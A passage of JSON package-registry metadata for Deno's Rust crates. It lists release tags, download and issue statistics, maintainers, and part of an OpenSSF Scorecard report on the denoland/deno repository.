ags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-31T09:36:56.177Z","dependent_packages_count":0,"downloads":19374,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":89.27037299225424,"dependent_repos_count":14.115217286716748,"dependent_packages_count":18.643770747565274,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":40.676453675512086},"purl":"pkg:cargo/deno_http_h1","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_http_h1","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_http_h1","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_http_h1/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-31T04:05:42.345Z","issues_count":6636,"pull_requests_count":9651,"avg_time_to_close_issue":17191240.372105263,"avg_time_to_close_pull_request":1531932.6714801444,"issues_closed_count":3798,"pull_requests_closed_count":8032,"pull_request_authors_count":583,"issue_authors_count":2480,"avg_comments_per_issue":2.5051235684147075,"avg_comments_per_pull_request":0.7197181639208372,"merged_pull_requests_count":7013,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":671,"past_year_pull_requests_count":1202,"past_year_avg_time_to_close_issue":1410952.7079646017,"past_year_avg_time_to_close_pull_request":1322346.2602118002,"past_year_issues_closed_count":226,"past_year_pull_requests_closed_count":661,"past_year_pull_request_authors_count":186,"past_year_issue_authors_count":373,"past_year_avg_comments_per_issue":1.232488822652757,"past_year_avg_comments_per_pull_request":1.1123128119800334,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":13,"past_year_merged_pull_requests_count":488,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1799,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":284,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":395,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":186,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"dsherret","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"devsnek","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_http_h1/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_http_h1/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_http_h1/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_http_h1/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_http_h1/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_http_h1/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2026-06-11T14:54:55.389Z","updated_at":"2026-06-11T14:54:55.389Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2026-06-11T14:54:55.435Z","updated_at":"2026-06-11T14:54:55.435Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":4047191,"name":"deno_core","ecosystem":"cargo","description":"A modern JavaScript/TypeScript runtime built with V8, Rust, and Tokio","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":398,"first_release_published_at":"2019-09-13T17:10:32.877Z","latest_release_published_at":"2026-08-06T11:34:15.141Z","latest_release_number":"0.410.0","last_synced_at":"2026-08-29T21:57:35.279Z","created_at":"2022-04-12T09:58:47.710Z","updated_at":"2026-08-31T09:36:56.178Z","registry_url":"https://crates.io/crates/deno_core/","install_command":"cargo install deno_core","documentation_url":"https://docs.rs/deno_core/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-29T19:17:00.000Z","size":248743,"stargazers_count":108340,"open_issues_count":1540,"forks_count":6359,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-29T21:56:41.390Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-29T20:05:41.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: 